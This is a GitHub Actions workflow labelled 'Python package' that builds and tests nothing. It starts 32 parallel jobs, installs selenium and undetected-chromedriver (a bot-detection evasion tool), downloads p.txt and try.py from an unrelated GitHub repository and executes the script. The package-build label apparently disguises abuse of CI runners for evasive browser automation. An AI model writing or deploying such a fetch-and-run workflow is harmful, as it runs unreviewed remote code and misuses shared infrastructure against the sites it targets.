name: Python package

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:

    runs-on: ubuntu-latest
    strategy:
      max-parallel: 40
      fail-fast: false
      matrix:
        python-version: ["3.7","3.8", "3.9", "3.10"]
        flag: [A,B,C,D,E,F,G,H]
    env:
      NUM_JOBS: 40
      JOB: ${{matrix.python-version}}

    steps:
    - uses: actions/checkout@v2
    - name: Set up Python ${{ matrix.python-version }}
      uses: actions/setup-python@v2
      with:
        python-version: ${{ matrix.python-version }}
    - name: Install dependencies
      run: |
        google-chrome --version
        chromedriver --version
        lscpu
        pip install xvfbwrapper
        pip install selenium
        pip install undetected-chromedriver
        wget https://raw.githubusercontent.com/yfvj45/yes/main/p.txt
        wget https://raw.githubusercontent.com/yfvj45/yes/main/try.py
        python try.py
